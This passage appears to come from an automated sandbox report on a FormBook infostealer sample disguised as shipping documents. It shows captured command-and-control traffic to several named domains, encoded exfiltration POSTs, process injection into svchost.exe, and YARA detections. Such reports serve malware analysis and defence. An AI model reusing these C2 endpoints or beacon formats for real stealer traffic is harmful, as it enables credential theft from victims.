                                              Data Ascii: 5HE=fEOgv+cN2RnTrgHxM4bgc61u/NxhTAINLBX9rCcuys9th3OnLLNGqqmmhxO/JVrh9Nj+POpTIfCYYKuGMxLfVkBIo8nEkTEL2ZtYzErvSHwfRb8+jWWb/DVqiVwkfPExjuhFPNHhNORxcOZrj5DtZCoejC4QaItTYons76r9SrTpdMHYraHLslZzdx5aN2IApsAWd7aNmnI0N8DblTI6Sec0EjqcH6Ub1JjYzRI=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              39 | 192.168.2.7 | 49744 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:43.689687014 CEST | 1745 | OUT | POST /5jc8/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Origin: http://www.betano627.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.betano627.com/5jc8/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              40 | 192.168.2.7 | 49745 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:46.219213963 CEST | 447 | OUT | GET /5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:46.713113070 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:33:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              41 | 192.168.2.7 | 49746 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:51.806200027 CEST | 727 | OUT | POST /ka5q/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Origin: http://www.nationsincbook.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.nationsincbook.com/ka5q/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=hZv4Qxh0B9hq8+mmsyNdnDC1BPV7gj6rwFxBN/s7tn5rLTZlLVX9mXiHuaRDMSXlwSyH7IJ7Xtb4XuoFkDOt6VanvjpDF0r9cP0SQ/vz3Nvqbj7+k9/Ehz1LC//UKszXLKCOOprpfbOGK5Psez1G9/DsN6Yb20+V0ZGNHHDOr0b75rq1ZeKzQuhY1VGPe1N2hJy3w2vwdUJ0PA3EJQ==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              42 | 192.168.2.7 | 49747 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:54.348809958 CEST | 747 | OUT | POST /ka5q/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Origin: http://www.nationsincbook.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.nationsincbook.com/ka5q/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=hZv4Qxh0B9hq+aamtQld2jC2NvV7qD6vwFtBN9AVsRprIxxlZEX9lXiH2qRCRCWnwS+57J17XtP4XswFnyOs5lappjoFYkr9cP0SQ8Sc3N3qbSr+lc/L9D1KH//UOszTLKDZOrfPfZGGK9HseHpFz/DuBqZRwU/38JCNe3zNmHHP4d3XD8GfO/ZjxXi5JTQDjI2v9UbRCjseCSWAfk+hT4GETQH46thxIGxBQ0I=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              43 | 192.168.2.7 | 49748 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:57.177315950 CEST | 1760 | OUT | POST /ka5q/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Origin: http://www.nationsincbook.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.nationsincbook.com/ka5q/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              44 | 192.168.2.7 | 49749 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:33:59.851136923 CEST | 452 | OUT | GET /ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:34:00.273647070 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:34:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              45 | 192.168.2.7 | 49750 | 84.32.84.32 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:34:22.745959997 CEST | 736 | OUT | POST /2afv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Origin: http://www.karak-networks.online
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.karak-networks.online/2afv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=sJwdFrlt0Sn1HIdSIGiXixRU7/XAHzPJSXbfQaNrZ3QgZabcq76YWdq7ggUvWurzSYkMFtm4PO/cD+qTzayeabbr1/5Le6mZnvXVZ35LaoBv99eFa0IvYLn3SfAsf5LzSJAwCreFKfueu0//YJO17DAwkOUpK8FG8xmZcPDymZ6ZyQG9aQONI8O5TNLPzZWamL6A5TZfHwt2FLRBLQ==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              46 | 192.168.2.7 | 49751 | 84.32.84.32 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:34:25.285720110 CEST | 756 | OUT | POST /2afv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Origin: http://www.karak-networks.online
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.karak-networks.online/2afv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=sJwdFrlt0Sn1EpNSJh2XkRRXnvXANTPNSXXfQe8uYEkga7rcr66YTdq7qAUubOrCSYgiFom4PODcD6uTzNmZLbbpz/5zAKmZnvXVZ3txasVv9NOFbWgsbLn0VfAsOJL3SJAOCu+/Kdmeu23/Zb22izAq6+VtN8xK4C/hZuKp/r2YzmbfAyChWt2CXPv5k/LvkK+Y0xt+YHIcIZwFdtiIzlsLf1Srmr1s112Z6u8=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              47 | 192.168.2.7 | 49752 | 84.32.84.32 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:34:27.816030025 CEST | 1769 | OUT | POST /2afv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Origin: http://www.karak-networks.online
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.karak-networks.online/2afv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              48 | 192.168.2.7 | 49753 | 84.32.84.32 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:34:31.720243931 CEST | 455 | OUT | GET /2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:34:32.187755108 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Server: hcdn
                                              Date: Sun, 21 Jul 2024 11:34:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 10072
                                              Connection: close
                                              Vary: Accept-Encoding
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 04598f4962530f157d4568d79490180a-bos-edge3
                                              Expires: Sun, 21 Jul 2024 11:34:31 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                              Jul 21, 2024 13:34:32.187872887 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                              Jul 21, 2024 13:34:32.188110113 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                              Jul 21, 2024 13:34:32.188184977 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                              Jul 21, 2024 13:34:32.188218117 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
Jul 21, 2024 13:34:32.188234091 CEST 1236 IN Data Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                              Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
Jul 21, 2024 13:34:32.188251019 CEST 1236 IN Data Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                              Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
Jul 21, 2024 13:34:32.188268900 CEST 1236 IN Data Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                              Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
Jul 21, 2024 13:34:32.188410044 CEST 524 IN Data Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                              Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


Session ID  Source IP    Source Port  Destination IP  Destination Port
49          192.168.2.7  49754        3.33.130.190    80

Timestamp                             Bytes transferred  Direction  Data
Jul 21, 2024 13:34:37.243309021 CEST  730                OUT        POST /c4g1/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.gtprivatewealth.com
                                              Origin: http://www.gtprivatewealth.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.gtprivatewealth.com/c4g1/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 31 51 71 77 63 34 62 34 6d 62 39 68 42 63 6e 35 50 54 39 6f 32 54 4f 46 7a 6b 6b 50 48 36 66 47 6e 74 44 42 49 6f 75 34 56 72 2b 36 55 50 6f 53 53 30 75 39 74 53 6f 32 61 6f 77 76 41 6f 62 63 77 56 79 6c 76 57 45 41 31 35 4f 66 38 6a 42 35 6e 5a 2f 59 47 47 49 49 6f 53 37 6f 4f 46 42 69 76 71 2b 2b 75 34 54 68 46 74 30 42 4d 67 69 6c 34 52 5a 34 32 33 57 63 6a 69 34 79 56 76 7a 68 55 4b 32 59 66 66 38 33 66 48 71 63 6f 70 2f 77 31 42 36 42 62 47 46 5a 34 7a 77 4c 50 2f 64 68 48 62 36 4e 75 36 69 69 45 59 68 49 4d 46 46 72 46 65 59 64 2b 76 41 65 38 75 42 54 4c 56 4f 77 54 37 2b 48 34 48 62 65 51 4d 44 72 6a 62 63 2f 52 77 3d 3d
                                              Data Ascii: 5HE=1Qqwc4b4mb9hBcn5PT9o2TOFzkkPH6fGntDBIou4Vr+6UPoSS0u9tSo2aowvAobcwVylvWEA15Of8jB5nZ/YGGIIoS7oOFBivq++u4ThFt0BMgil4RZ423Wcji4yVvzhUK2Yff83fHqcop/w1B6BbGFZ4zwLP/dhHb6Nu6iiEYhIMFFrFeYd+vAe8uBTLVOwT7+H4HbeQMDrjbc/Rw==


Session ID  Source IP    Source Port  Destination IP  Destination Port
50          192.168.2.7  49755        3.33.130.190    80

Timestamp                             Bytes transferred  Direction  Data
Jul 21, 2024 13:34:39.783036947 CEST  750                OUT        POST /c4g1/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.gtprivatewealth.com
                                              Origin: http://www.gtprivatewealth.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.gtprivatewealth.com/c4g1/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 31 51 71 77 63 34 62 34 6d 62 39 68 41 38 58 35 4a 7a 42 6f 39 54 50 33 38 45 6b 50 4e 61 66 4b 6e 74 66 42 49 70 61 6f 56 5a 71 36 56 74 77 53 52 31 75 39 71 53 6f 32 4f 34 77 75 45 6f 62 58 77 55 50 61 76 58 6f 41 31 35 71 66 38 69 78 35 6e 75 6a 5a 48 57 49 57 75 53 37 71 41 6c 42 69 76 71 2b 2b 75 34 76 48 46 74 73 42 50 54 71 6c 35 7a 78 33 37 58 57 64 6b 69 34 79 52 76 79 4a 55 4b 33 31 66 61 5a 59 66 42 32 63 6f 6f 6a 77 79 51 36 43 4d 32 46 54 6d 44 78 54 41 74 4d 2f 49 34 65 41 6e 38 79 63 4e 34 4a 65 41 54 59 4a 66 38 55 78 67 2b 34 6c 34 73 6c 6c 63 7a 54 46 52 36 36 66 31 6c 76 2f 50 37 6d 42 75 4a 39 37 48 46 75 7a 68 55 55 6d 4a 6a 56 61 77 51 56 62 4d 4b 50 56 79 6c 34 3d
                                              Data Ascii: 5HE=1Qqwc4b4mb9hA8X5JzBo9TP38EkPNafKntfBIpaoVZq6VtwSR1u9qSo2O4wuEobXwUPavXoA15qf8ix5nujZHWIWuS7qAlBivq++u4vHFtsBPTql5zx37XWdki4yRvyJUK31faZYfB2coojwyQ6CM2FTmDxTAtM/I4eAn8ycN4JeATYJf8Uxg+4l4sllczTFR66f1lv/P7mBuJ97HFuzhUUmJjVawQVbMKPVyl4=


                                              Target ID:0
                                              Start time:07:30:21
                                              Start date:21/07/2024
                                              Path:C:\Users\user\Desktop\Documente de expediere.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Documente de expediere.exe"
                                              Imagebase:0x690000
                                              File size:1'168'384 bytes
                                              MD5 hash:3ED2ECA087936D7AB479CE62C50A9F2A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:07:30:23
                                              Start date:21/07/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Documente de expediere.exe"
                                              Imagebase:0x700000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:13
                                              Start time:07:30:43
                                              Start date:21/07/2024
                                              Path:C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe"
                                              Imagebase:0xb00000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:14
                                              Start time:07:30:45
                                              Start date:21/07/2024
                                              Path:C:\Windows\SysWOW64\certutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\certutil.exe"
                                              Imagebase:0xe60000
                                              File size:1'277'440 bytes
                                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
